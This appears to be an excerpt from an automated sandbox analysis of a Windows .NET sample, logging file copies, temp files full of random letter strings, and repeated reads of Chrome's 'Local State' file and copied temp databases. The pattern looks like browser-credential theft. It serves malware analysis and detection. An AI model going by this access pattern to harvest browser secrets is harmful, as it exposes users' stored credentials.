NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVP

success or wait 1 3E6803 CopyFileW

C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp

0 1026

AIXACVYBSBCZDJMZUDVNECMFSGJSAOAIXCJFDPHQJVUANUFFPQXVYJRUGYPJGKEJNXCBTXARAETAKFTJKVLIZEXLMOAPVEZRZZUIRDUKSPZRBPINNEKLCLXBHFZMBRJTUJZTRCGQGFRQCEVPUBAAPBHBTYYHDJZHHPMFAKXVJPQRQCRUFYPMNUCRRQOYXYEHXQEHWHFLZSBMLRRZFLLYUQLADTKEDXVDLKLPZTTCNAXMXPSTCHQKWMSRPNRZGUL

success or wait 1 3E6803 CopyFileW



C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp

0 1026

NHPKIZUUSGERQSLBGSEAVXGNDWXNHRIMGKQZIYGMNAKLDSDLMZTSHWNQSMRLTOXKIQVZWPTPMYGCCCTOQMOFGPYVVCCUDORIXMMXDHKCETULBHLJENABEIJPTFOHFPIUUSFPUHSBHENDANFMOYZRZAXYVFEZIKDKUEVZAWEFKRTUJZPFUDMEZZQVBGYMMIHKEBYJMJMTTXSDTDQAUATXLABLBEJUBBPSXZPXMHVNHOHYPKCYLDVGJSBPEXWGYVP

success or wait 1 3E6803 CopyFileW


File Path Offset Length Completion Count Source Address Symbol

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6D517995 unknown

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 6135 success or wait 1 6D517995 unknown

C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll.aux

unknown 176 success or wait 1 6D42DE2C ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4095 success or wait 1 6D51A1A4 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\eb4cca4f06a15158c3f7e2c56516729b\System.Core.ni.dll.aux

unknown 900 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System\1be7a15b1f33bf22e4f53aaf45518c77\System.ni.dll.aux

unknown 620 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.ServiceModel\aac4a7fee37b96c05eb0862217745fc1\System.ServiceModel.ni.dll.aux

unknown 3948 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\9b0d0cb232dec8e57df49678532cb923\System.Runtime.Serialization.ni.dll.aux

unknown 1100 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\SMDiagnostics\cde471ea4f02c36c73581ed5681e463e\SMDiagnostics.ni.dll.aux

unknown 924 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\4fbda26d781323081b45526da6e87b35\System.Xml.ni.dll.aux

unknown 748 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Servd1dec626#\1348a5d04b41c614e48fe5fdb88d1cfa\System.ServiceModel.Internals.ni.dll.aux

unknown 592 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\fe4b221b4109f0c78f57a792500699b5\System.Configuration.ni.dll.aux

unknown 864 success or wait 1 6D42DE2C ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 success or wait 1 6C51B2B3 ReadFile

C:\Windows\Microsoft.NET\Framework\v4.0.30319\Config\machine.config unknown 4096 end of file 1 6C51B2B3 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\5faf546a8e018d89b1c277e0be243e4b\System.Net.Http.ni.dll.aux

unknown 536 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Web.28b9ef5a#\97cbf6eb6477005cffa6992126db856c\System.Web.Extensions.ni.dll.aux

unknown 3712 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Web\9e5950923286f171d1649a05bdc62830\System.Web.ni.dll.aux

unknown 3972 success or wait 1 6D42DE2C ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 3 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 24 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 291 end of file 3 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 end of file 3 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp62EE.tmp unknown 40960 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp64E3.tmp unknown 40960 success or wait 1 6C51B2B3 ReadFile

File Read


C:\Users\user\AppData\Local\Temp\tmp67A3.tmp unknown 40960 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 291 end of file 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp6C85.tmp unknown 28672 success or wait 1 6C51B2B3 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Security\754ca70e68140abcdb8476cff64c4169\System.Security.ni.dll.aux

unknown 912 success or wait 1 6D42DE2C ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 3 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 291 end of file 3 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp71C5.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp738B.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp7551.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 4096 success or wait 3 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State unknown 291 end of file 3 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp7718.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp790D.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp7AA5.tmp unknown 77824 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp7CF7.tmp unknown 524288 success or wait 1 6C51B2B3 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management\98d3949f9ba1a384939805aa5e47e933\System.Management.ni.dll.aux

unknown 764 success or wait 1 6D42DE2C ReadFile

C:\Users\user\AppData\Local\Temp\tmp533A.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp3E26.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp3EE2.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile

C:\Users\user\AppData\Local\Temp\tmp3FAE.tmp unknown 4096 success or wait 1 6C51B2B3 ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\fb06ad4bc55b9c3ca68a3f9259d826cd\System.Windows.Forms.ni.dll.aux

unknown 1720 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\1d52bd4ac5e0a6422058a5d62c9f6d9d\System.Drawing.ni.dll.aux

unknown 584 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\849e4f93d41f8b6645878090ee9a7505\Microsoft.CSharp.ni.dll.aux

unknown 700 success or wait 1 6D42DE2C ReadFile

C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dynamic\81f3dddd8aa6172d72bf5f1161e6fd01\System.Dynamic.ni.dll.aux

unknown 536 success or wait 1 6D42DE2C ReadFile


Disassembly

⊘ No disassembly
